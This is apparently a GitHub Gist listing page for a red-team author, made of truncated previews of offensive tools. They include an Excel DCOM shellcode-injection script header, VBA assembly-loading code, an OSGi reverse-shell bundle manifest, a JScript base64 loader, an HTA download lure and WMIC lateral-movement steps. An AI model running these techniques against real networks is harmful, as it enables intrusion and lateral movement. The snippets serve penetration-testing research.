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Steve Borosh rvrsh3ll

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MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
WITH as n,
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
function Invoke-Excel4DCOM
rvrsh3ll / mscorlib_load_assembly.vba
Created October 3, 2019 00:38 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
Bundle-Name: rvrsh3ll osgi package
Bundle-Description: rvrsh3ll osgi package
Bundle-SymbolicName: com.rvrsh3ll.osgi.shellme.Activator
Bundle-Vendor: rvrsh3ll
Bundle-Version: 1.0.0
Import-Package: org.osgi.framework
Bundle-Activator: com.rvrsh3ll.osgi.shellme.Activator
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
[JS File]
function setversion() {
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
rvrsh3ll / Find-Assemblies.ps1
Last active February 14, 2020 03:29 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
HelpMessage="Directory to search for .NET Assemblies in.")]
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
function Invoke-SMBWmi {
$ComputerName = ".",
$Pipename = "tf12lol"
<a href="#" id="download">legit</al>
var element = document.getElementById("download");
element.href = "legit.hta";;
rvrsh3ll / wmicLateralMovement.txt
Created December 11, 2019 22:30 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell ( but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName